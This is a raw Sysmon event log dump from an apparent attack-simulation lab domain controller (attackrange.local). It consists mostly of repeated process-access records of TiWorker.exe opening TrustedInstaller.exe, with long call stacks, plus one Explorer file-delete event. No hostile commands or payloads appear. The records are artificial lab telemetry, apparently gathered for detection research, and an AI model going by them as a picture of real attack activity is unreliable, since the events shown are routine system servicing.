12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.119{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.103{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.088{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.088{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.088{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms~RF1b149.TMPMD5=6852E3A0BF1C01BB4DBFCB51C1A7C087,SHA256=74D6D8C58D0BEB0716EEECDC55366E193186924A616E057CD210F4104E5D85E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.088{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
